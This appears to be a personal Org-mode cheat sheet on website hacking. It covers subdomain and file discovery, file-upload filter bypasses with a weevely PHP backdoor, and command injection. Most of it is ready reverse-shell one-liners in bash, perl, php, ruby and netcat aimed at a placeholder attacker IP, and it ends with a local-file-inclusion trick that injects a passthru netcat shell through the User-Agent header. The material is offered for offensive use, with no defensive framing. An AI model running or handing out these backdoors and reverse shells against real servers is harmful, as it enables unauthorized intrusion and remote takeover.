WebsiteHacking.org 3.3 KB
Website Hacking
Gathering Information
We can gather information from a website using a whois lookup:
We can also discover subdomains:
knockpy --domain [target_domain] --recon # use a passive information gathering method knockpy --domain [target_domain] --bruteforce # use an active information gathering method
We can discover files using dirb:
dirb [target] [wordlist] [options]
File Upload Vulnerabilities
They are the simplest type of vulnerability, as they allow users to upload executable files, such as php files.
We can generate a PHP shell using weevely:
weevely generate [password] [file_name] # generate backdoor
weevely [url to file] [password] # connect to backdoor
If the website has some sort of protection to these kind of files, we can fire
up BurpSuite, rename our shell to shell.jpg so the content-type is set to
image/jpeg, and we can change the final filename with burpsuite. If it still
doesn't work, we can upload a file like shell.php.jpg to see if it works. Some
examples of names can be:
upload.php --- try to upload a simple php file upload.php.jpeg --- To bypass the blacklist. upload.jpg.php --- To bypass the blacklist. upload.php --- and Then Change the content type of the file to image or jpeg. upload.php* --- version - 1 2 3 4 5 6 7 upload.PHP --- To bypass The BlackList upload.PhP --- To bypass The BlackList upload.pHp --- To bypass The BlackList
Code Execution Vulnerabilities
These vulnerabilities, allow an attacker to execute OS commands, whether they
are Windows, or Linux commands. They can be used to get a reverse shell, or to
upload any file using the wget command.
We can append ; at the end of a command to see if anything can be executed.
I.e. pwd. If ; doesn't work, we can try to do |.
Some commands we can execute to get a reverse shell are:
bash -i >& /dev/tcp/[ip_address]/8080 0>&1
perl -e 'use Socket;$i="[ip_address]";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
php -r '$sock=fsockopen("[ip_address]",8080);exec("/bin/sh -i <&3 >&3 2>&3");'
ruby -rsocket -e'f=TCPSocket.open("[ip_address]",8080).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
nc -e /bin/sh [ip_address] 8080
For netcat, we'd need to listen at:
nc -vv -l -p 8080
Local File Inclusion Vulnerabilities
Allows an attacker to read ANY file on the same server, and to access files
outside of the www directory. We can get /etc/passwd, for example.
We can gain a reverse shell by exploiting this vulnerability, we can try to
inject code into readable files. What can be done is that we go to the
~/proc/self/environ~ file, and a variable HTTP_USER_AGENT is sent. With
BurpSuite we can modify the user agent under the header section for it to
execute PHP code. We can do something like:
passthru("nc -e /bin/sh [ip_address] [port]");